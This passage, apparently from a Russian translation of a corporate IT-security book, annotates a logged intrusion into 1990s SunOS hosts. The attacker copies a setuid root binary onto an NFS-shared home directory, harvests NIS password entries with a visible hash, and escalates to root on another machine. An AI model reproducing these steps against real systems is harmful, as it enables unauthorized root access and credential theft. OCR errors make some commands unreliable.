IT-безопасность: стоит ли рисковать корпорацией? - [78]
Строки с № 210 по № 212
Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код и готов идти дальше.
Строки с № 213 по № 227
Хакер проверяет, какие файловые системы подмонтированы.
198 #4)
199 # id
200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff)
201 # тс^С
202 # mv^С
203 #mv a.out shit
204 # Is — tal
205 total 2415
206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.
207 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
208-rw-r-r- 1 root 61 Jan 18 23:11 c.c
209 — rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa
210#rmaaa
211 #rmc.c
212 rm: override protection 644 for c.c? у
213 #df
214 Filesystem kbytes used avail capacity Mounted on
215 /dev/sdOa 10483 5081 4354 54 % /
216 /dev/sdOg 96943 78335 8914 90 % /usr
217 /dev/sdOe 22927 3111 17524 15 %/var
218 /dev/sd1h 1255494 1081249 48696 96 % /home
219 /dev/sd3h 1255494 1030386 99559 91 % /home/se
220 la:/usr/local 2097151 1154033 692365 63 % /usr/local
221 suntzu:/var/spool/mail
222 445852 334295 66972 83 % /var/spool/mail
223 mfp:/home/sybase 318991 244337 42755 85 % /home/sybase
224 арр1:/export/sun/sun4/openwin-3,0
225 189858 131073 39799 77 % /usr/openwin
226 арр1:/export/apps 1255494 771887 358057 68 % /export/apps
227 appl:/export/apps 1255494 771887 358057 68 % /usr/local
Строки с № 228 по № 229
Неверный ввод или, возможно шумы в линии.
Строки с № 230 по № 258
Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользователем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать пользователя dan. Вероятно, хакер уже знает, что dan существует.
228 # irG-cd /home/se
229 irG-cd: not found
230 # cd/home/se
231 # Is
232 cmeyer hamant lost+found mikec wendy
233 colleen Joseph mark mikep
234 derek kevin matthews neally
235 # cd wendy
236 # cp Дтр/shit.
237 # Is — tal shit
238 — rwxr-xr-x 1 root 24576 Jan 18 23:13 shit
239 # chmod 6777 shit
240 # Is — tal shit
241 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
242 # pwd
243 /home/se/wendy
244 # cd Amp
245 # Is — tal | more
246 total 2398
247 drwxrwsrwx 3 bin 1024 Jan 18 23:13.
248 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit
249 — rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk
250-rw-r-r- 1 cmeyer 12 Jan 13 12:05 junk.dat
251 — rw-r-r- 1 derek 0 Jan 12 16:07 6310
252 (16 строк вывода удалены и хакер стал пользователем wendy)
253 hacker typos
254 # rm shit
255 # grep dan/etc/passwd
256 # ypcat passwd | grep dan
257danf:*:13602:50::/home/guest/danf:/bin/csh
258 dan:*H.6Haolt2xDu2:13601:50:&:/home/guest/dan:/bin/csh
Строки с № 259 по № 263
Еще несколько тревожных взглядов вокруг (с помощью who).
Строки с № 264 по № 273
Он снова превращается в jeff. Очевидно, что реальный jeff был в системе немного раньше хакера, который входит сейчас в suntzu как jeff. И снова пароля не требуется.
Строка № 274
Другая смена оболочки, чтобы не оставлять отметки о себе в журналах history.
Строки с № 275 по № 281
Хакер пытается убедиться, что /home/se подмонтирован из хоста tsunami. (Если вы помните, в /home/se/wendy он оставил свой исполняемый код. Ему это было нужно для получения доступа с правами суперпользователя к этому новому хосту.)
259 # who
260 wendy ttyp2 Jan 6 13:55 (arawana)
261 derekttyp3Jan 13 17:57 (lajolla)
262 derek ttyp4 Jan 15 13:11 (lajolla)
263 jeff ttyp5 Jan 18 23:09 (valley)
264 #T>
265 $ id
266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)
267 $ rlogin suntzu
268 Last login: Thu Jan 14 06:35:30 on ttyhl
269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992
270 You have new mail.
271 suntzu% who
272 jeff ttyp0 Jan 18 23:14
273 (tsunami)
274 suntzu% sh
275 $ df
276 Filesystem kbytes used avail capacity Mounted on
277 /dev/sd6a 14983 11056 2429 82 % /
278 /dev/sd6g 91998 76365 6434 92 % /usr
279 /dev/sd6h 445852 334297 66970 83 % /var
280 /dev/sd4c 1255494 1030410 99535 91 % /home/se
281 tsunami:/home/se 1255494 1030410 99535 91 % Ampjnnt/ home/se
Строки с № 282 по № 287
Хакер применяет свой исполняемый код и получает права суперпользователя на доступ к системе suntzu. В итоге он уже скомпрометировал три системы.
Строки с № 288 по № 292
Он снова ищет пароли. (Кажется, это становится уже знакомым?)
Строки с № 293 по № 317
Хакер переходит к гостевому личному каталогу и выводит список его содержимого. Он замечает в личном каталоге файл под именем dan/test.
Строка № 318
Я удалила несколько строк из соображений конфиденциальности.
282 $ cd /home/se/wendy
283 $ Is — tal shit
284 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit
285 $./shit
286 # id
287 uid=0(root) gid=0(wheel) groups=50(lastaff)
288 # Is — tal /etcfass*
289 — rw-r-r-1 root 15465 Jan 1514:29/etc/passwd
290 — rw-r-r-1 root 15462 Dec 28 17:58/etc/passwd.OLD
291 — rw-r-r-1 root 15514 Nov 12 18:58/etc/passwd.old
292 — rw-r-r-1 root 15215 Sep 9 10:02 /etc/passwd-
293 # cd /home/guests
294 /home/guests: bad directory
295 # cd /home/guest
296 # Is — tal
297 total 56
298 dr-xr-xr-x 10 root 512 Jan 18 23:15..
299 drwxr-xr-x 9 guestl 1024 Jan 15 16:21 guestl
300 drwxr-xr-x 11 тагу 1536 Jan 1417:37 тагу
301 drwxr-xr-x 5 jeffs 512 Jan 12 15:57 jeffs